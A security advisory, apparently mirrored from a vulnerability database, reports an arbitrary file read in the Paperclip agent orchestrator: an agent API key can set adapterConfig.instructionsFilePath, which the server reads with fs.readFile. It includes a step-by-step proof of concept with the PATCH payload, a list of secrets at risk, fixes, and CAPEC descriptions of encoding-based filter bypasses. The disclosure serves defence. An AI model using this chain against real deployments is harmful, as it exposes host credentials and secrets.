const instructionsContent = await fs.readFile(instructionsFilePath, "utf-8");

Because the value originates from attacker-controlled configuration and no validation or sandboxing is applied, this becomes a direct host filesystem read primitive.

Affected Files

Primary vulnerable file:

packages/adapters/claude-local/src/server/execute.ts

Relevant function:

execute()

Sensitive operation:

fs.readFile(instructionsFilePath)

Configuration source:

PATCH /api/agents/:id

Validation logic:

packages/shared/src/validators/agent.ts

Attacker Model

Required privileges Attacker requires:

Agent API key

Agent credentials are intended for automation and integration with external runtimes. These credentials are commonly used by:

agent runtime environments
third-party integrations
automation pipelines

Agent credentials are not intended to grant direct access to the server host filesystem. No board or administrator privileges are required.

Attacker Chain

Complete exploit chain:

Attacker obtains Agent API key
        ↓
PATCH /api/agents/:id
        ↓
Inject adapterConfig.instructionsFilePath
        ↓
POST /api/agents/:id/wakeup
        ↓
Server executes agent run
        ↓
execute.ts
        ↓
fs.readFile(attacker_path)
        ↓
Server reads host filesystem path

This allows an attacker to read arbitrary files accessible to the Paperclip server process.

Trust Boundary Violation

Paperclip’s architecture assumes the following separation:

Agent runtime
        ↓
Paperclip orchestration layer
        ↓
Server host filesystem

Agents should only interact with repositories and workflows through the orchestration layer.

However, because agent-controlled configuration is passed directly into fs.readFile, the boundary collapses:

Agent configuration
        ↓
Server filesystem access

This allows an agent to access files outside its intended permission scope.

Why This Is a Vulnerability (Not Expected Behavior)

The instructionsFilePath configuration appears intended for trusted operators configuring agent runtime behavior. However, the current API design allows agents themselves to modify this configuration through the agent API. Because agent credentials may be exposed to external systems or runtime environments, allowing them to control server filesystem paths introduces a security vulnerability. Therefore:

Operator-controlled configuration → expected feature
Agent-controlled configuration → arbitrary file read vulnerability

The issue arises from insufficient separation between configuration authority and filesystem access authority.

PoC

The following PoC demonstrates that the server attempts to read an attacker-controlled filesystem path. To avoid accessing sensitive data, the PoC uses a non-existent path.

Step 1 — Setup Environment

Run server:

$env:SHELL = "C:\Program Files\Git\bin\sh.exe"
npx paperclipai onboard --yes

Login Claude:

claude
/login

Step 2 — Obtain Agent API key

Create an agent via the UI or CLI and obtain its API key. Example: image

Step 3 — Identify agent ID

GET /api/agents/me

image

Step 4 — Inject malicious configuration

PATCH /api/agents/{agentId}

Payload example:

{
  "adapterConfig": {
    "instructionsFilePath": "C:\\definitely-does-not-exist-paperclip-poc.txt"
  }
}

Example PowerShell payload:

$patchBody = @{
  adapterConfig = @{
    instructionsFilePath = "C:\definitely-does-not-exist-paperclip-poc.txt"
  }
} | ConvertTo-Json -Depth 10

image

Step 5 — Trigger execution

POST /api/agents/{agentId}/wakeup

image

Step 6 — Observe server log

Server log shows:

ENOENT: no such file or directory, open 'C:\definitely-does-not-exist-paperclip-poc.txt'
    at async Object.readFile
    at async Object.execute (.../adapter-claude-local/dist/server/execute.js)

This confirms the server attempted to read an attacker-controlled filesystem path. image

Impact

Successful exploitation allows attackers to read sensitive files accessible to the Paperclip server process. Examples of potentially exposed data include:

environment configuration (.env)
SSH private keys
database credentials
API tokens
CI secrets

Possible attacker actions:

exfiltrate secrets
access private repositories
steal infrastructure credentials
pivot into connected services

Because Paperclip orchestrates repositories, agents, and automation tasks, disclosure of such secrets may lead to compromise of the broader deployment environment.

Recommended Fix

Restrict configuration authority

Agents should not be allowed to modify filesystem-sensitive configuration fields. Example mitigation:

adapterConfig.instructionsFilePath

should only be configurable by board/admin actors.

Path validation

Restrict file access to a safe directory such as:

workspace/
agent-config/

Reject:

absolute paths
system directories
paths containing ".."

Avoid direct filesystem reads from configuration

Instead of:

fs.readFile(user_supplied_path)

use:

readFile(workspaceSafePath)

Example guard

if (
  request.auth?.principal === "agent" &&
  body?.adapterConfig?.instructionsFilePath
) {
  throw new Error(
    "Agents are not permitted to configure instructionsFilePath"
  );
}

Security Impact Statement

An authenticated attacker with an Agent API key can modify their agent configuration to inject an arbitrary filesystem path into adapterConfig.instructionsFilePath. The Paperclip server reads this path during agent execution via fs.readFile, allowing the attacker to access files on the server host filesystem.

Disclosure

This vulnerability was discovered during security research on the Paperclip orchestration runtime and is reported privately to allow maintainers to patch the issue before public disclosure.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@paperclipai/shared"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2026.416.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-73"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-16T22:45:14Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\nPaperclip contains an arbitrary file read vulnerability that allows an attacker with an Agent API key to read files from the Paperclip server host filesystem.\nThe vulnerability occurs because agents are allowed to modify their own adapterConfig through the /agents/:id API endpoint.\nThe configuration field adapterConfig.instructionsFilePath is later read directly by the server runtime using fs.readFile().\nBecause no validation or path restriction is applied, an attacker can supply an arbitrary filesystem path.\nThe Paperclip server then attempts to read that path from the host filesystem during agent execution.\nThis breaks the intended trust boundary between agent runtime configuration and server host filesystem access, allowing a compromised or malicious agent to access sensitive files on the host system.\n\n### Details\n#### Root Cause\nNo path normalization, allowlist, or workspace boundary validation is applied before the filesystem read occurs.\nAgent configuration can be modified through the API endpoint:\n```\nPATCH /api/agents/:id\n```\nThe validation schema allows arbitrary configuration fields inside adapterConfig.\nFile:\n```\npackages/shared/src/validators/agent.ts\n```\nSchema fragment:\n```\nadapterConfig: z.record(z.unknown())\n```\nBecause of this schema, attackers can inject arbitrary configuration values, including:\n```\nadapterConfig.instructionsFilePath\n```\nDuring agent execution, the server runtime reads this path directly from the host filesystem using fs.readFile().\nRelevant code path:\n```\npackages/adapters/claude-local/src/server/execute.ts\n```\nExecution flow:\n```\nadapterConfig.instructionsFilePath\n        \u2193\nexecute()\n        \u2193\nfs.readFile(instructionsFilePath)\n        \u2193\nfile content loaded into runtime\n```\nVulnerable logic:\n```\nconst instructionsContent = await fs.readFile(instructionsFilePath, \"utf-8\");\n```\nBecause the value originates from attacker-controlled configuration and no validation or sandboxing is applied, this becomes a direct host filesystem read primitive.\n\n#### Affected Files\nPrimary vulnerable file:\n```\npackages/adapters/claude-local/src/server/execute.ts\n```\nRelevant function:\n```\nexecute()\n```\nSensitive operation:\n```\nfs.readFile(instructionsFilePath)\n```\nConfiguration source:\n```\nPATCH /api/agents/:id\n```\nValidation logic:\n```\npackages/shared/src/validators/agent.ts\n```\n\n#### Attacker Model\nRequired privileges\nAttacker requires:\n```\nAgent API key\n```\nAgent credentials are intended for automation and integration with external runtimes.\nThese credentials are commonly used by:\n```\nagent runtime environments\nthird-party integrations\nautomation pipelines\n```\nAgent credentials are not intended to grant direct access to the server host filesystem.\nNo board or administrator privileges are required.\n\n#### Attacker Chain\nComplete exploit chain:\n```\nAttacker obtains Agent API key\n        \u2193\nPATCH /api/agents/:id\n        \u2193\nInject adapterConfig.instructionsFilePath\n        \u2193\nPOST /api/agents/:id/wakeup\n        \u2193\nServer executes agent run\n        \u2193\nexecute.ts\n        \u2193\nfs.readFile(attacker_path)\n        \u2193\nServer reads host filesystem path\n```\nThis allows an attacker to read arbitrary files accessible to the Paperclip server process.\n\n#### Trust Boundary Violation\nPaperclip\u2019s architecture assumes the following separation:\n```\nAgent runtime\n        \u2193\nPaperclip orchestration layer\n        \u2193\nServer host filesystem\n\nAgents should only interact with repositories and workflows through the orchestration layer.\n\nHowever, because agent-controlled configuration is passed directly into fs.readFile, the boundary collapses:\n\nAgent configuration\n        \u2193\nServer filesystem access\n```\nThis allows an agent to access files outside its intended permission scope.\n\n#### Why This Is a Vulnerability (Not Expected Behavior)\nThe instructionsFilePath configuration appears intended for trusted operators configuring agent runtime behavior.\nHowever, the current API design allows agents themselves to modify this configuration through the agent API.\nBecause agent credentials may be exposed to external systems or runtime environments, allowing them to control server filesystem paths introduces a security vulnerability.\nTherefore:\n```\nOperator-controlled configuration \u2192 expected feature\nAgent-controlled configuration \u2192 arbitrary file read vulnerability\n```\nThe issue arises from insufficient separation between configuration authority and filesystem access authority.\n\n### PoC\nThe following PoC demonstrates that the server attempts to read an attacker-controlled filesystem path.\nTo avoid accessing sensitive data, the PoC uses a non-existent path.\n#### Step 1 \u2014 Setup Environment\nRun server:\n```\n$env:SHELL = \"C:\\Program Files\\Git\\bin\\sh.exe\"\nnpx paperclipai onboard --yes\n```\nLogin Claude:\n```\nclaude\n/login\n```\n#### Step 2 \u2014 Obtain Agent API key\nCreate an agent via the UI or CLI and obtain its API key.\nExample:\n\u003cimg width=\"1475\" height=\"710\" alt=\"image\" src=\"https://github.com/user-attachments/assets/fcc0dfe9-1271-4eed-af0a-7dd83dfa9ad4\" /\u003e\n\n#### Step 3 \u2014 Identify agent ID\n```\nGET /api/agents/me\n```\n\u003cimg width=\"824\" height=\"196\" alt=\"image\" src=\"https://github.com/user-attachments/assets/af4a16bb-9bff-485d-af23-4a85d31486fc\" /\u003e\n\n#### Step 4 \u2014 Inject malicious configuration\n```\nPATCH /api/agents/{agentId}\n```\nPayload example:\n```powershell\n{\n  \"adapterConfig\": {\n    \"instructionsFilePath\": \"C:\\\\definitely-does-not-exist-paperclip-poc.txt\"\n  }\n}\n```\nExample PowerShell payload:\n```powershell\n$patchBody = @{\n  adapterConfig = @{\n    instructionsFilePath = \"C:\\definitely-does-not-exist-paperclip-poc.txt\"\n  }\n} | ConvertTo-Json -Depth 10\n```\n\u003cimg width=\"1891\" height=\"963\" alt=\"image\" src=\"https://github.com/user-attachments/assets/1a8c41b4-c053-4498-8bf5-ce41c7dfa1b5\" /\u003e\n\nStep 5 \u2014 Trigger execution\n```\nPOST /api/agents/{agentId}/wakeup\n```\n\u003cimg width=\"927\" height=\"376\" alt=\"image\" src=\"https://github.com/user-attachments/assets/d6107b64-1b5e-493c-9a66-45a4713260b5\" /\u003e\n\n#### Step 6 \u2014 Observe server log\nServer log shows:\n```\nENOENT: no such file or directory, open \u0027C:\\definitely-does-not-exist-paperclip-poc.txt\u0027\n    at async Object.readFile\n    at async Object.execute (.../adapter-claude-local/dist/server/execute.js)\n```\nThis confirms the server attempted to read an attacker-controlled filesystem path.\n\u003cimg width=\"1916\" height=\"166\" alt=\"image\" src=\"https://github.com/user-attachments/assets/2470438a-bf5a-4f6f-848c-b134d3f0cc3f\" /\u003e\n\n### Impact\nSuccessful exploitation allows attackers to read sensitive files accessible to the Paperclip server process.\nExamples of potentially exposed data include:\n```\nenvironment configuration (.env)\nSSH private keys\ndatabase credentials\nAPI tokens\nCI secrets\n```\nPossible attacker actions:\n```\nexfiltrate secrets\naccess private repositories\nsteal infrastructure credentials\npivot into connected services\n```\nBecause Paperclip orchestrates repositories, agents, and automation tasks, disclosure of such secrets may lead to compromise of the broader deployment environment.\n\n### Recommended Fix\n#### Restrict configuration authority\nAgents should not be allowed to modify filesystem-sensitive configuration fields.\nExample mitigation:\n```\nadapterConfig.instructionsFilePath\n```\nshould only be configurable by board/admin actors.\n\n#### Path validation\nRestrict file access to a safe directory such as:\n```\nworkspace/\nagent-config/\n```\nReject:\n```\nabsolute paths\nsystem directories\npaths containing \"..\"\n```\n\n#### Avoid direct filesystem reads from configuration\nInstead of:\n```\nfs.readFile(user_supplied_path)\n```\nuse:\n```\nreadFile(workspaceSafePath)\n```\nExample guard\n```ts\nif (\n  request.auth?.principal === \"agent\" \u0026\u0026\n  body?.adapterConfig?.instructionsFilePath\n) {\n  throw new Error(\n    \"Agents are not permitted to configure instructionsFilePath\"\n  );\n}\n```\n\n### Security Impact Statement\nAn authenticated attacker with an Agent API key can modify their agent configuration to inject an arbitrary filesystem path into adapterConfig.instructionsFilePath.\nThe Paperclip server reads this path during agent execution via fs.readFile, allowing the attacker to access files on the server host filesystem.\n\n### Disclosure\nThis vulnerability was discovered during security research on the Paperclip orchestration runtime and is reported privately to allow maintainers to patch the issue before public disclosure.",
  "id": "GHSA-3pw3-v88x-xj24",
  "modified": "2026-04-16T22:45:14Z",
  "published": "2026-04-16T22:45:14Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/paperclipai/paperclip/security/advisories/GHSA-3pw3-v88x-xj24"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/paperclipai/paperclip"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Paperclip: Arbitrary File Read via Agent-Controlled adapterConfig.instructionsFilePath"
}

Mitigation
Architecture and Design

When the set of filenames is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames, and reject all other inputs. For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap provide this capability.

Mitigation
Architecture and Design Operation
  • Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict all access to files within a particular directory.
  • Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection.
  • This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.
  • Be careful to avoid CWE-243 and other weaknesses related to jails.
Mitigation
Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Mitigation MIT-5.1
Implementation

Strategy: Input Validation

  • Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
  • When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
  • Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
  • When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.
  • Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string.
Mitigation
Implementation

Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes ".." sequences and symbolic links (CWE-23, CWE-59).

Mitigation
Installation Operation

Use OS-level permissions and run as a low-privileged user to limit the scope of any successful attack.

Mitigation
Operation Implementation

If you are using PHP, configure your application so that it does not use register_globals. During implementation, develop your application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues.

Mitigation
Testing

Use tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules.

CAPEC-13: Subverting Environment Variable Values

The adversary directly or indirectly modifies environment variables used by or controlling the target software. The adversary's goal is to cause the target software to deviate from its expected operation in a manner that benefits the adversary.

CAPEC-267: Leverage Alternate Encoding

An adversary leverages the possibility to encode potentially harmful input or content used by applications such that the applications are ineffective at validating this encoding standard.

CAPEC-64: Using Slashes and URL Encoding Combined to Bypass Validation Logic

This attack targets the encoding of the URL combined with the encoding of the slash characters. An attacker can take advantage of the multiple ways of encoding a URL and abuse the interpretation of the URL. A URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE). For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc.

CAPEC-72: URL Encoding

This attack targets the encoding of the URL. An adversary can take advantage of the multiple way of encoding an URL and abuse the interpretation of the URL.

CAPEC-76: Manipulating Web Input to File System Calls

An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.

CAPEC-78: Using Escaped Slashes in Alternate Encoding

This attack targets the use of the backslash in alternate encoding. An adversary can provide a backslash as a leading character and causes a parser to believe that the next character is special. This is called an escape. By using that trick, the adversary tries to exploit alternate ways to encode the same character which leads to filter problems and opens avenues to attack.

CAPEC-79: Using Slashes in Alternate Encoding

This attack targets the encoding of the Slash characters. An adversary would try to exploit common filtering problems related to the use of the slashes characters to gain access to resources on the target host. Directory-driven systems, such as file systems and databases, typically use the slash character to indicate traversal between directories or other container components. For murky historical reasons, PCs (and, as a result, Microsoft OSs) choose to use a backslash, whereas the UNIX world typically makes use of the forward slash. The schizophrenic result is that many MS-based systems are required to understand both forms of the slash. This gives the adversary many opportunities to discover and abuse a number of common filtering problems. The goal of this pattern is to discover server software that only applies filters to one version, but not the other.

CAPEC-80: Using UTF-8 Encoding to Bypass Validation Logic

This attack is a specific variation on leveraging alternate encodings to bypass validation logic. This attack leverages the possibility to encode potentially harmful input in UTF-8 and submit it to applications not expecting or effective at validating this encoding standard making input filtering difficult. UTF-8 (8-bit UCS/Unicode Transformation Format) is a variable-length character encoding for Unicode. Legal UTF-8 characters are one to four bytes long. However, early version of the UTF-8 specification got some entries wrong (in some cases it permitted overlong characters). UTF-8 encoders are supposed to use the "shortest possible" encoding, but naive decoders may accept encodings that are longer than necessary. According to the RFC 3629, a particularly subtle form of this attack can be carried out against a parser which performs security-critical validity checks against the UTF-8 encoded form of its input, but interprets certain illegal octet sequences as characters.